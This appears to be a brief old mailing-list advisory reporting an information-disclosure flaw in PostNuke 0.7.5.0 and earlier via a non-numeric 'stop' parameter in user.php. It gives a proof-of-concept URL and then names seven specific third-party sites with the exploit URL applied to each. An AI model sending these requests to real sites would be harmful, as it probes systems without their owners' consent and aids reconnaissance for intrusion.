Vulnerability in PostNuke
Error PostNuke in the variable stop which can be exploited by malicious
people to disclose system information. Luckily the vulnerability
affects to the 0.7.5.0 version and minors.
POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/user.php?stop=a
http://www.americavivetv.com/user.php?stop=a
http://www.ciberpsique.net/user.php?stop=a
http://www.bonsaiabm.com/user.php?stop=a
http://www.elrincondejada.net/user.php?stop=a
http://www.salsa.org.pl/user.php?stop=a
http://www.choco.org/user.php?stop=a
by rMrGvG
http://SNI-LABS.com
since 1998
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.